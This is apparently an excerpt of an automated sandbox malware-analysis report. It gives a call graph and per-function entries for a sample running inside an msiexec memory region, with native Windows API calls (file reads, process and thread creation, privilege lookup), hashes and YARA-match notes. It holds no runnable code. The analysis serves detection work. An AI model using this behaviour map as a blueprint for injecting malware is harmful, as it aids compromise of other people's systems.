ea84f0 31125->31521 31128 ea8720 2 API calls 31126->31128 31129 e98b95 31128->31129 31129->31051 31131 ea6e6f 31130->31131 31155 ea3e60 31131->31155 31133 e98ad3 31134 ea6d10 31133->31134 31161 ea8890 31134->31161 31138 ea9559 31137->31138 31168 ea3a60 31138->31168 31140 ea9571 31141 ea957a 31140->31141 31207 ea9380 31140->31207 31141->31106 31143 ea958e 31143->31141 31225 ea8190 31143->31225 31481 e96e30 31148->31481 31150 e98901 31150->31108 31151 e988fa 31151->31150 31494 e970f0 31151->31494 31154->31110 31156 ea3e6e 31155->31156 31157 ea3e7a 31155->31157 31156->31157 31160 ea42e0 LdrLoadDll 31156->31160 31157->31133 31159 ea3fcc 31159->31133 31160->31159 31164 ea91f0 31161->31164 31163 ea6d25 31163->31104 31165 ea9200 31164->31165 31167 ea9222 31164->31167 31166 ea3e60 LdrLoadDll 31165->31166 31166->31167 31167->31163 31169 ea3d95 31168->31169 31171 ea3a74 31168->31171 31169->31140 31171->31169 31233 ea7ee0 31171->31233 31173 ea3b83 31293 ea86f0 LdrLoadDll 31173->31293 31174 ea3ba0 31236 ea85f0 31174->31236 31177 ea3b8d 31177->31140 31178 ea3bc7 31179 eaa0b0 2 API calls 31178->31179 31181 ea3bd3 31179->31181 31180 ea3d59 31183 ea8720 2 API calls 31180->31183 31181->31177 31181->31180 31182 ea3d6f 31181->31182 31187 ea3c62 31181->31187 31302 ea37a0 LdrLoadDll NtReadFile NtReadFile NtClose 31182->31302 31184 ea3d60 31183->31184 31184->31140 31186 ea3d82 31186->31140 31188 ea3cc9 31187->31188 31190 ea3c71 31187->31190 31188->31180 31189 ea3cdc 31188->31189 31295 ea8570 31189->31295 31192 ea3c8a 31190->31192 31193 ea3c76 31190->31193 31196 ea3c8f 31192->31196 31197 ea3ca7 31192->31197 31294 ea3660 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 31193->31294 31239 ea3700 31196->31239 31197->31184 31251 ea3420 31197->31251 31199 ea3c80 31199->31140 31201 ea3d3c 31299 ea8720 31201->31299 31202 ea3c9d 31202->31140 31205 ea3cbf 31205->31140 31206 ea3d48 31206->31140 31208 ea9386 31207->31208 31209 ea93a3 31208->31209 31322 eaa030 31208->31322 31209->31143 31211 ea93c4 31325 ea3070 31211->31325 31213 ea9410 31213->31143 31214 ea93e7 31214->31213 31215 ea3070 2 API calls 31214->31215 31216 ea9409 31215->31216 31216->31213 31357 ea43a0 31216->31357 31218 ea949a 31219 ea94aa 31218->31219 31451 ea9190 LdrLoadDll 31218->31451 31367 ea9000 31219->31367 31222 ea94d8 31446 ea8150 31222->31446 31226 ea81ac 31225->31226 31227 ea91f0 LdrLoadDll 31225->31227 31475 4d4967a 31226->31475 31227->31226 31228 ea81c7 31230 eaa0b0 31228->31230 31478 ea8900 31230->31478 31232 ea95e9 31232->31106 31234 ea91f0 LdrLoadDll 31233->31234 31235 ea3b54 31234->31235 31235->31173 31235->31174 31235->31177 31237 ea860c NtCreateFile 31236->31237 31238 ea91f0 LdrLoadDll 31236->31238 31237->31178 31238->31237 31240 ea371c 31239->31240 31241 ea8570 LdrLoadDll 31240->31241 31242 ea373d 31241->31242 31243 ea3758 31242->31243 31244 ea3744 31242->31244 31245 ea8720 2 API calls 31243->31245 31246 ea8720 2 API calls 31244->31246 31247 ea3761 31245->31247 31248 ea374d 31246->31248 31303 eaa2c0 LdrLoadDll 31247->31303 31248->31202 31250 ea376c 31250->31202 31252 ea346b 31251->31252 31253 ea349e 31251->31253 31254 ea8570 LdrLoadDll 31252->31254 31255 ea35e9 31253->31255 31259 ea34ba 31253->31259 31256 ea3486 31254->31256 31257 ea8570 LdrLoadDll 31255->31257 31258 ea8720 2 API calls 31256->31258 31263 ea3604 31257->31263 31260 ea348f 31258->31260 31261 ea8570 LdrLoadDll 31259->31261 31260->31205 31262 ea34d5 31261->31262 31265 ea34dc 31262->31265 31266 ea34f1 31262->31266 31318 ea85b0 LdrLoadDll 31263->31318 31270 ea8720 2 API calls 31265->31270 31267 ea350c 31266->31267 31268 ea34f6 31266->31268 31279 ea3511 31267->31279 31313 eaa280 31267->31313 31272 ea8720 2 API calls 31268->31272 31269 ea363e 31273 ea8720 2 API calls 31269->31273 31271 ea34e5 31270->31271 31271->31205 31275 ea34ff 31272->31275 31274 ea3649 31273->31274 31274->31205 31275->31205 31276 ea3523 31276->31205 31279->31276 31304 ea86a0 31279->31304 31280 ea358e 31283 ea35aa 31280->31283 31284 ea3595 31280->31284 31281 ea3577 31281->31280 31317 ea8530 LdrLoadDll 31281->31317 31286 ea8720 2 API calls 31283->31286 31285 ea8720 2 API calls 31284->31285 31285->31276 31287 ea35b3 31286->31287 31288 ea35df 31287->31288 31308 ea9e80 31287->31308 31288->31205 31290 ea35ca 31291 eaa0b0 2 API calls 31290->31291 31292 ea35d3 31291->31292 31292->31205 31293->31177 31294->31199 31296 ea91f0 LdrLoadDll 31295->31296 31297 ea3d24 31295->31297 31296->31297 31298 ea85b0 LdrLoadDll 31297->31298 31298->31201 31300 ea91f0 LdrLoadDll 31299->31300 31301 ea873c NtClose 31300->31301 31301->31206 31302->31186 31303->31250 31305 ea86a6 31304->31305 31306 ea91f0 LdrLoadDll 31305->31306 31307 ea86bc NtReadFile 31306->31307 31307->31281 31309 ea9ea4 31308->31309 31310 ea9e8d 31308->31310 31309->31290 31310->31309 31311 eaa280 LdrLoadDll 31310->31311 31312 ea9ebb 31311->31312 31312->31290 31314 eaa281 31313->31314 31319 ea88c0 31314->31319 31316 eaa298 31316->31279 31317->31280 31318->31269 31320 ea91f0 LdrLoadDll 31319->31320 31321 ea88dc 31320->31321 31321->31316 31323 eaa05d 31322->31323 31452 ea87d0 LdrLoadDll 31322->31452 31323->31211 31326 ea3081 31325->31326 31327 ea3089 31325->31327 31326->31214 31356 ea335c 31327->31356 31453 eab260 31327->31453 31329 ea30dd 31330 eab260 LdrLoadDll 31329->31330 31331 ea30e8 31330->31331 31332 ea3136 31331->31332 31335 eab390 2 API calls 31331->31335 31467 eab300 LdrLoadDll RtlFreeHeap 31331->31467 31334 eab260 LdrLoadDll 31332->31334 31337 ea314a 31334->31337 31335->31331 31336 ea31a7 31338 eab260 LdrLoadDll 31336->31338 31337->31336 31458 eab390 31337->31458 31339 ea31bd 31338->31339 31341 ea31fa 31339->31341 31343 eab390 2 API calls 31339->31343 31342 eab260 LdrLoadDll 31341->31342 31344 ea3205 31342->31344 31343->31339 31345 eab390 2 API calls 31344->31345 31352 ea323f 31344->31352 31345->31344 31348 eab2c0 2 API calls 31349 ea333e 31348->31349 31350 eab2c0 2 API calls 31349->31350 31351 ea3348 31350->31351 31353 eab2c0 2 API calls 31351->31353 31464 eab2c0 31352->31464 31354 ea3352 31353->31354 31355 eab2c0 2 API calls 31354->31355 31355->31356 31356->31214 31358 ea43b1 31357->31358 31359 ea3a60 8 API calls 31358->31359 31360 ea43c7 31359->31360 31361 ea4402 31360->31361 31362 ea4415 31360->31362 31366 ea441a 31360->31366 31363 eaa0b0 2 API calls 31361->31363 31364 eaa0b0 2 API calls 31362->31364 31365 ea4407 31363->31365 31364->31366 31365->31218 31366->31218 31468 ea8ec0 31367->31468 31370 ea8ec0 LdrLoadDll 31371 ea901d 31370->31371 31372 ea8ec0 LdrLoadDll 31371->31372 31373 ea9026 31372->31373 31374 ea8ec0 LdrLoadDll 31373->31374 31375 ea902f 31374->31375 31376 ea8ec0 LdrLoadDll 31375->31376 31377 ea9038 31376->31377 31378 ea8ec0 LdrLoadDll 31377->31378 31379 ea9041 31378->31379 31380 ea8ec0 LdrLoadDll 31379->31380 31381 ea904d 31380->31381 31382 ea8ec0 LdrLoadDll 31381->31382 31383 ea9056 31382->31383 31384 ea8ec0 LdrLoadDll 31383->31384 31385 ea905f 31384->31385 31386 ea8ec0 LdrLoadDll 31385->31386 31387 ea9068 31386->31387 31388 ea8ec0 LdrLoadDll 31387->31388 31389 ea9071 31388->31389 31390 ea8ec0 LdrLoadDll 31389->31390 31391 ea907a 31390->31391 31392 ea8ec0 LdrLoadDll 31391->31392 31393 ea9086 31392->31393 31394 ea8ec0 LdrLoadDll 31393->31394 31395 ea908f 31394->31395 31396 ea8ec0 LdrLoadDll 31395->31396 31397 ea9098 31396->31397 31398 ea8ec0 LdrLoadDll 31397->31398 31399 ea90a1 31398->31399 31400 ea8ec0 LdrLoadDll 31399->31400 31401 ea90aa 31400->31401 31402 ea8ec0 LdrLoadDll 31401->31402 31403 ea90b3 31402->31403 31404 ea8ec0 LdrLoadDll 31403->31404 31405 ea90bf 31404->31405 31406 ea8ec0 LdrLoadDll 31405->31406 31407 ea90c8 31406->31407 31408 ea8ec0 LdrLoadDll 31407->31408 31409 ea90d1 31408->31409 31410 ea8ec0 LdrLoadDll 31409->31410 31411 ea90da 31410->31411 31412 ea8ec0 LdrLoadDll 31411->31412 31413 ea90e3 31412->31413 31414 ea8ec0 LdrLoadDll 31413->31414 31415 ea90ec 31414->31415 31416 ea8ec0 LdrLoadDll 31415->31416 31417 ea90f8 31416->31417 31418 ea8ec0 LdrLoadDll 31417->31418 31419 ea9101 31418->31419 31420 ea8ec0 LdrLoadDll 31419->31420 31421 ea910a 31420->31421 31422 ea8ec0 LdrLoadDll 31421->31422 31423 ea9113 31422->31423 31424 ea8ec0 LdrLoadDll 31423->31424 31425 ea911c 31424->31425 31426 ea8ec0 LdrLoadDll 31425->31426 31427 ea9125 31426->31427 31428 ea8ec0 LdrLoadDll 31427->31428 31429 ea9131 31428->31429 31430 ea8ec0 LdrLoadDll 31429->31430 31431 ea913a 31430->31431 31432 ea8ec0 LdrLoadDll 31431->31432 31433 ea9143 31432->31433 31434 ea8ec0 LdrLoadDll 31433->31434 31435 ea914c 31434->31435 31436 ea8ec0 LdrLoadDll 31435->31436 31437 ea9155 31436->31437 31438 ea8ec0 LdrLoadDll 31437->31438 31439 ea915e 31438->31439 31440 ea8ec0 LdrLoadDll 31439->31440 31441 ea916a 31440->31441 31442 ea8ec0 LdrLoadDll 31441->31442 31443 ea9173 31442->31443 31444 ea8ec0 LdrLoadDll 31443->31444 31445 ea917c 31444->31445 31445->31222 31447 ea91f0 LdrLoadDll 31446->31447 31448 ea816c 31447->31448 31474 4d49860 LdrInitializeThunk 31448->31474 31449 ea8183 31449->31143 31451->31219 31452->31323 31454 eab270 31453->31454 31455 eab276 31453->31455 31454->31329 31456 eaa280 LdrLoadDll 31455->31456 31457 eab29c 31456->31457 31457->31329 31459 eab300 31458->31459 31460 eab35d 31459->31460 31461 eaa280 LdrLoadDll 31459->31461 31460->31337 31462 eab33a 31461->31462 31463 eaa0b0 2 API calls 31462->31463 31463->31460 31465 eaa0b0 2 API calls 31464->31465 31466 ea3334 31465->31466 31466->31348 31467->31331 31469 ea8edb 31468->31469 31470 ea3e60 LdrLoadDll 31469->31470 31471 ea8efb 31470->31471 31472 ea3e60 LdrLoadDll 31471->31472 31473 ea8fa7 31471->31473 31472->31473 31473->31370 31474->31449 31476 4d49681 31475->31476 31477 4d4968f LdrInitializeThunk 31475->31477 31476->31228 31477->31228 31479 ea91f0 LdrLoadDll 31478->31479 31480 ea891c RtlFreeHeap 31479->31480 31480->31232 31482 e96e3b 31481->31482 31483 e96e40 31481->31483 31482->31151 31484 eaa030 LdrLoadDll 31483->31484 31491 e96e65 31484->31491 31485 e96ec8 31485->31151 31486 ea8150 2 API calls 31486->31491 31487 e96ece 31488 e96ef4 31487->31488 31490 ea8850 2 API calls 31487->31490 31488->31151 31493 e96ee5 31490->31493 31491->31485 31491->31486 31491->31487 31492 eaa030 LdrLoadDll 31491->31492 31497 ea8850 31491->31497 31492->31491 31493->31151 31495 ea8850 2 API calls 31494->31495 31496 e9710e 31495->31496 31496->31108 31498 ea886c 31497->31498 31499 ea91f0 LdrLoadDll 31497->31499 31502 4d496e0 LdrInitializeThunk 31498->31502 31499->31498 31500 ea8883 31500->31491 31502->31500 31504 ea9853 31503->31504 31507 e99b50 31504->31507 31508 e99b74 31507->31508 31509 e99bb0 LdrLoadDll 31508->31509 31510 e98a7a 31508->31510 31509->31510 31510->31114 31512 e99ec3 31511->31512 31513 e99f40 31512->31513 31526 ea7f20 LdrLoadDll 31512->31526 31513->31121 31516 ea91f0 LdrLoadDll 31515->31516 31517 e9cfbb 31516->31517 31517->31129 31518 ea8a60 31517->31518 31519 ea91f0 LdrLoadDll 31518->31519 31520 ea8a7f LookupPrivilegeValueW 31519->31520 31520->31125 31522 ea91f0 LdrLoadDll 31521->31522 31523 ea850c 31522->31523 31527 4d49910 LdrInitializeThunk 31523->31527 31524 ea852b 31524->31126 31526->31513 31527->31524 31529 e9a047 31528->31529 31530 e99ea0 LdrLoadDll 31529->31530 31531 e9a076 31530->31531 31531->31067 31533 e99d94 31532->31533 31586 ea7f20 LdrLoadDll 31533->31586 31535 e99dce 31535->31069 31537 e9d1ac 31536->31537 31538 e9a020 LdrLoadDll 31537->31538 31539 e9d1be 31538->31539 31587 e9d090 31539->31587 31542 e9d1d9 31544 e9d1e4 31542->31544 31546 ea8720 2 API calls 31542->31546 31543 e9d1f1 31545 e9d202 31543->31545 31547 ea8720 2 API calls 31543->31547 31544->31073 31545->31073 31546->31544 31547->31545 31549 e9aef6 31548->31549 31550 e9af00 31548->31550 31549->31082 31551 e99ea0 LdrLoadDll 31550->31551 31552 e9af71 31551->31552 31553 e99d70 LdrLoadDll 31552->31553 31554 e9af85 31553->31554 31555 e9afa8 31554->31555 31556 e99ea0 LdrLoadDll 31554->31556 31557 e9afc4 31554->31557 31555->31082 31556->31557 31558 ea3a60 8 API calls 31557->31558 31559 e9b019 31558->31559 31559->31082 31561 e9ba69 31560->31561 31562 e99ea0 LdrLoadDll 31561->31562 31563 e9ba8a 31562->31563 31606 e9b740 31563->31606 31565 e97f9c 31584 e9b030 LdrLoadDll 31565->31584 31635 e9d440 31566->31635 31568 e97e41 31568->31071 31569 e97c93 31569->31568 31640 ea33b0 31569->31640 31571 e97cf2 31571->31568 31643 e97a30 31571->31643 31574 eab260 LdrLoadDll 31575 e97d39 31574->31575 31576 eab390 2 API calls 31575->31576 31580 e97d4e 31576->31580 31577 e96e30 3 API calls 31577->31580 31580->31568 31580->31577 31582 e970f0 2 API calls 31580->31582 31648 e9ac10 31580->31648 31698 e9d3e0 31580->31698 31702 e9cec0 19 API calls 31580->31702 31582->31580 31583->31076 31584->31087 31585->31095 31586->31535 31588 e9d0aa 31587->31588 31596 e9d160 31587->31596 31589 e99ea0 LdrLoadDll 31588->31589 31590 e9d0cc 31589->31590 31597 ea81d0 31590->31597 31592 e9d10e 31600 ea8210 31592->31600 31595 ea8720 2 API calls 31595->31596 31596->31542 31596->31543 31598 ea81ec 31597->31598 31599 ea91f0 LdrLoadDll 31597->31599 31598->31592 31599->31598 31601 ea91f0 LdrLoadDll 31600->31601 31602 ea822c 31601->31602 31605 4d49fe0 LdrInitializeThunk 31602->31605 31603 e9d154 31603->31595 31605->31603 31607 e9b757 31606->31607 31608 e9b79f 31607->31608 31615 e9d480 31607->31615 31623 ea8970 31608->31623 31611 e9b7cb 31612 e9b7d2 31611->31612 31626 ea8530 LdrLoadDll 31611->31626 31612->31565 31614 e9b7e5 31614->31565 31616 e9d4a5 31615->31616 31627 e97130 31616->31627 31618 e9d4c9 31619 e9d4d6 31618->31619 31620 ea3a60 8 API calls 31618->31620 31622 eaa0b0 2 API calls 31618->31622 31634 e9d2c0 LdrLoadDll CreateProcessInternalW LdrInitializeThunk 31618->31634 31619->31608 31620->31618 31622->31618 31624 ea91f0 LdrLoadDll 31623->31624 31625 ea898f CreateProcessInternalW 31624->31625 31625->31611 31626->31614 31628 e9722f 31627->31628 31629 e97145 31627->31629 31628->31618 31629->31628 31630 ea3a60 8 API calls 31629->31630 31631 e971b2 31630->31631 31632 eaa0b0 2 API calls 31631->31632 31633 e971d9 31631->31633 31632->31633 31633->31618 31634->31618 31636 ea3e60 LdrLoadDll 31635->31636 31637 e9d45f 31636->31637 31638 e9d46d 31637->31638 31639 e9d466 SetErrorMode 31637->31639 31638->31569 31639->31638 31642 ea33d6 31640->31642 31703 e9d210 31640->31703 31642->31571 31644 eaa030 LdrLoadDll 31643->31644 31647 e97a55 31644->31647 31645 e97c6a 31645->31574 31647->31645 31722 ea7b10 31647->31722 31649 e9ac29 31648->31649 31650 e9ac2f 31648->31650 31771 e9ccd0 31649->31771 31780 e98630 31650->31780 31653 e9ac3c 31654 eab390 2 API calls 31653->31654 31697 e9aec8 31653->31697 31655 e9ac58 31654->31655 31656 e9ac6c 31655->31656 31657 e9d3e0 2 API calls 31655->31657 31789 ea7fa0 31656->31789 31657->31656 31660 e9ad96 31805 e9abb0 LdrLoadDll LdrInitializeThunk 31660->31805 31661 ea8190 2 API calls 31662 e9acea 31661->31662 31662->31660 31667 e9acf6 31662->31667 31664 e9adb5 31665 e9adbd 31664->31665 31806 e9ab20 LdrLoadDll NtClose LdrInitializeThunk 31664->31806 31668 ea8720 2 API calls 31665->31668 31666 e9ad3f 31672 ea8720 2 API calls 31666->31672 31667->31666 31670 ea82a0 2 API calls 31667->31670 31667->31697 31671 e9adc7 31668->31671 31670->31666 31671->31580 31674 e9ad5c 31672->31674 31673 e9addf 31673->31665 31675 e9ade6 31673->31675 31792 ea75c0 31674->31792 31677 e9adfe 31675->31677 31807 e9aaa0 LdrLoadDll LdrInitializeThunk 31675->31807 31808 ea8020 LdrLoadDll 31677->31808 31679 e9ad73 31679->31697 31795 e97290 31679->31795 31681 e9ae12 31809 e9a920 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 31681->31809 31685 e9ae36 31686 e9ae83 31685->31686 31810 ea8050 LdrLoadDll 31685->31810 31812 ea80b0 LdrLoadDll 31686->31812 31689 e9ae91 31691 ea8720 2 API calls 31689->31691 31690 e9ae54 31690->31686 31811 ea80e0 LdrLoadDll 31690->31811 31692 e9ae9b 31691->31692 31693 ea8720 2 API calls 31692->31693 31695 e9aea5 31693->31695 31696 e97290 3 API calls 31695->31696 31695->31697 31696->31697 31697->31580 31699 e9d3f3 31698->31699 31883 ea8120 31699->31883 31702->31580 31704 e9d22d 31703->31704 31710 ea8250 31704->31710 31707 e9d275 31707->31642 31711 ea91f0 LdrLoadDll 31710->31711 31712 ea826c 31711->31712 31720 4d499a0 LdrInitializeThunk 31712->31720 31713 e9d26e 31713->31707 31715 ea82a0 31713->31715 31716 ea91f0 LdrLoadDll 31715->31716 31717 ea82bc 31716->31717 31721 4d49780 LdrInitializeThunk 31717->31721 31718 e9d29e 31718->31642 31720->31713 31721->31718 31723 eaa280 LdrLoadDll 31722->31723 31724 ea7b27 31723->31724 31743 e98170 31724->31743 31726 ea7b42 31727 ea7b69 31726->31727 31728 ea7b80 31726->31728 31729 eaa0b0 2 API calls 31727->31729 31731 eaa030 LdrLoadDll 31728->31731 31730 ea7b76 31729->31730 31730->31645 31732 ea7bba 31731->31732 31733 eaa030 LdrLoadDll 31732->31733 31734 ea7bd3 31733->31734 31740 ea7e74 31734->31740 31749 eaa070 LdrLoadDll 31734->31749 31736 ea7e59 31737 ea7e60 31736->31737 31736->31740 31738 eaa0b0 2 API calls 31737->31738 31739 ea7e6a 31738->31739 31739->31645 31741 eaa0b0 2 API calls 31740->31741 31742 ea7ec9 31741->31742 31742->31645 31744 e98195 31743->31744 31745 e99b50 LdrLoadDll 31744->31745 31746 e981c8 31745->31746 31748 e981ed 31746->31748 31750 e9b350 31746->31750 31748->31726 31749->31736 31751 e9b37c 31750->31751 31752 ea8470 LdrLoadDll 31751->31752 31753 e9b395 31752->31753 31754 e9b39c 31753->31754 31761 ea84b0 31753->31761 31754->31748 31758 e9b3d7 31759 ea8720 2 API calls 31758->31759 31760 e9b3fa 31759->31760 31760->31748 31762 ea84cc 31761->31762 31763 ea91f0 LdrLoadDll 31761->31763 31770 4d49710 LdrInitializeThunk 31762->31770 31763->31762 31764 e9b3bf 31764->31754 31766 ea8aa0 31764->31766 31767 ea8aa1 31766->31767 31768 ea91f0 LdrLoadDll 31767->31768 31769 ea8abf 31768->31769 31769->31758 31770->31764 31772 e9cce7 31771->31772 31813 e9bdc0 31771->31813 31779 e9cd00 31772->31779 31826 e93d70 31772->31826 31774 eaa280 LdrLoadDll 31776 e9cd0e 31774->31776 31776->31650 31777 e9ccfa 31850 ea7440 31777->31850 31779->31774 31782 e9864b 31780->31782 31781 e9876b 31781->31653 31782->31781 31783 e9d090 3 API calls 31782->31783 31784 e9874c 31783->31784 31785 e9877a 31784->31785 31786 e98761 31784->31786 31787 ea8720 2 API calls 31784->31787 31785->31653 31882 e95ea0 LdrLoadDll 31786->31882 31787->31786 31790 ea91f0 LdrLoadDll 31789->31790 31791 e9acc0 31790->31791 31791->31660 31791->31661 31791->31697 31793 e9d3e0 2 API calls 31792->31793 31794 ea75f2 31793->31794 31794->31679 31796 e972a8 31795->31796 31797 e99b50 LdrLoadDll 31796->31797 31798 e972c3 31797->31798 31799 ea3e60 LdrLoadDll 31798->31799 31800 e972d3 31799->31800 31801 e972dc PostThreadMessageW 31800->31801 31802 e9730d 31800->31802 31801->31802 31803 e972f0 31801->31803 31802->31580 31804 e972fa PostThreadMessageW 31803->31804 31804->31802 31805->31664 31806->31673 31807->31677 31808->31681 31809->31685 31810->31690 31811->31686 31812->31689 31814 e9bdf3 31813->31814 31855 e9a160 31814->31855 31816 e9be05 31859 e9a2d0 31816->31859 31818 e9be23 31819 e9a2d0 LdrLoadDll 31818->31819 31820 e9be39 31819->31820 31821 e9d210 3 API calls 31820->31821 31822 e9be5d 31821->31822 31823 e9be64 31822->31823 31865 eaa2c0 LdrLoadDll 31822->31865 31823->31772 31825 e9be74 31825->31772 31827 e93d96 31826->31827 31828 e9b350 3 API calls 31827->31828 31830 e93e61 31828->31830 31829 e93e68 31829->31777 31830->31829 31867 eaa300 31830->31867 31832 e93ec9 31833 e99ea0 LdrLoadDll 31832->31833 31834 e93fd3 31833->31834 31835 e99ea0 LdrLoadDll 31834->31835 31836 e93ff7 31835->31836 31871 e9b410 31836->31871 31840 e94083 31841 eaa030 LdrLoadDll 31840->31841 31842 e94110 31841->31842 31843 eaa030 LdrLoadDll 31842->31843 31845 e9412a 31843->31845 31844 e942a6 31844->31777 31845->31844 31846 e99ea0 LdrLoadDll 31845->31846 31847 e9416a 31846->31847 31848 e99d70 LdrLoadDll 31847->31848 31849 e9420a 31848->31849 31849->31777 31851 ea3e60 LdrLoadDll 31850->31851 31852 ea7461 31851->31852 31853 ea7487 31852->31853 31854 ea7474 CreateThread 31852->31854 31853->31779 31854->31779 31856 e9a16a 31855->31856 31857 e99ea0 LdrLoadDll 31856->31857 31858 e9a1c3 31857->31858 31858->31816 31860 e99ea0 LdrLoadDll 31859->31860 31861 e9a2e9 31859->31861 31860->31861 31863 e9a328 31861->31863 31866 ea1880 LdrLoadDll 31861->31866 31863->31818 31864 e9a3e0 31864->31818 31865->31825 31866->31864 31868 eaa30d 31867->31868 31869 ea3e60 LdrLoadDll 31868->31869 31870 eaa320 31869->31870 31870->31832 31872 e9b435 31871->31872 31876 ea8320 31872->31876 31875 ea83b0 LdrLoadDll 31875->31840 31877 ea91f0 LdrLoadDll 31876->31877 31878 ea833c 31877->31878 31881 4d496d0 LdrInitializeThunk 31878->31881 31879 e9405c 31879->31840 31879->31875 31881->31879 31882->31781 31884 ea91f0 LdrLoadDll 31883->31884 31885 ea813c 31884->31885 31888 4d49840 LdrInitializeThunk 31885->31888 31886 e9d41e 31886->31580 31888->31886 31889 ea7310 31890 ea734b 31889->31890 31891 eaa030 LdrLoadDll 31889->31891 31892 ea742c 31890->31892 31893 e99b50 LdrLoadDll 31890->31893 31891->31890 31894 ea7381 31893->31894 31895 ea3e60 LdrLoadDll 31894->31895 31897 ea739d 31895->31897 31896 ea73b0 Sleep 31896->31897 31897->31892 31897->31896 31900 ea6f40 LdrLoadDll 31897->31900 31901 ea7140 LdrLoadDll 31897->31901 31900->31897 31901->31897

                              Executed Functions

                              Function 00EA8642 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 73filenativeCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 315 ea8642-ea864f 316 ea8651-ea8699 call ea91f0 315->316 317 ea86a6-ea86e9 call ea91f0 NtReadFile 315->317 316->317
                              APIs
                              • NtReadFile.NTDLL(00EA3D82,5E972F65,FFFFFFFF,?,?,?,00EA3D82,?,A:,FFFFFFFF,5E972F65,00EA3D82,?,00000000), ref: 00EA86E5
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.938025961.0000000000E90000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E90000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_e90000_msiexec.jbxd
                              Yara matches
                              Similarity
                              • API ID: FileRead
                              • String ID: *9$A:
                              • API String ID: 2738559852-581087195
                              • Opcode ID: a03d9bae96f467c0aa395323aaccb52df568358fa498be35b51e186da3de9fc5
                              • Instruction ID: 9b8d17a9c40fce361f7a9e96ba15f0ce0095c343d0adef75e2787d8b1654b7a0
                              • Opcode Fuzzy Hash: a03d9bae96f467c0aa395323aaccb52df568358fa498be35b51e186da3de9fc5
                              • Instruction Fuzzy Hash: 3021E3B2204109ABDB18DF99DC84EEB77A9EF8C354F158248BA0DA7241C630E811CBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00EA85EA Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41filenativeCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 452 ea85ea-ea8641 call ea91f0 NtCreateFile
                              APIs
                              • NtCreateFile.NTDLL(00000060,00000000,.z`,00EA3BC7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00EA3BC7,007A002E,00000000,00000060,00000000,00000000), ref: 00EA863D
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.938025961.0000000000E90000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E90000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_e90000_msiexec.jbxd
                              Yara matches
                              Similarity
                              • API ID: CreateFile
                              • String ID: .z`
                              • API String ID: 823142352-1441809116
                              • Opcode ID: 5665064f3c64043a90c0fd2c1c31b96cfa13a65bfc068bcfabdd1cfea6a69486
                              • Instruction ID: 63a6c63958b1a336d2440d6f4afa5846daaf97b707c975b53816434eb4d40bc7
                              • Opcode Fuzzy Hash: 5665064f3c64043a90c0fd2c1c31b96cfa13a65bfc068bcfabdd1cfea6a69486
                              • Instruction Fuzzy Hash: 6901A4B2611108AFCB48CF98DC85EEB77E9AF9C754F158249BA0DD7241D630E811CBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00EA85F0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 455 ea85f0-ea8606 456 ea860c-ea8641 NtCreateFile 455->456 457 ea8607 call ea91f0 455->457 457->456
                              APIs
                              • NtCreateFile.NTDLL(00000060,00000000,.z`,00EA3BC7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00EA3BC7,007A002E,00000000,00000060,00000000,00000000), ref: 00EA863D
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.938025961.0000000000E90000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E90000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_e90000_msiexec.jbxd
                              Yara matches
                              Similarity
                              • API ID: CreateFile
                              • String ID: .z`
                              • API String ID: 823142352-1441809116
                              • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                              • Instruction ID: 0b35eb51e635469c2270232a434f4afd69ffceeb0f6e8250d2672d84e05849c8
                              • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                              • Instruction Fuzzy Hash: E8F0B2B2201208ABCB08CF88DC85EEB77EDAF8C754F158248BA0D97241C630F811CBA4
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00EA869A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 38filenativeCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 458 ea869a-ea86e9 call ea91f0 NtReadFile
                              APIs
                              • NtReadFile.NTDLL(00EA3D82,5E972F65,FFFFFFFF,?,?,?,00EA3D82,?,A:,FFFFFFFF,5E972F65,00EA3D82,?,00000000), ref: 00EA86E5
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.938025961.0000000000E90000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E90000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_e90000_msiexec.jbxd
                              Yara matches
                              Similarity
                              • API ID: FileRead
                              • String ID: A:
                              • API String ID: 2738559852-1209300218
                              • Opcode ID: 7806de6a9a1ab518ab594c854be9053a4dfb9cc74e814942fda7c4050aa266c8
                              • Instruction ID: dba95c03aa40c0dd8839701896ba6c0db80e7f40a0d55be3c0caf358780c6ffb
                              • Opcode Fuzzy Hash: 7806de6a9a1ab518ab594c854be9053a4dfb9cc74e814942fda7c4050aa266c8
                              • Instruction Fuzzy Hash: 9AF0A4B2200109ABCB14DF99DC85EEB77ADAF8C754F158649BE1DA7251DA30E811CBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00EA86A0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36filenativeCOMMON
                              Download Yara Rule

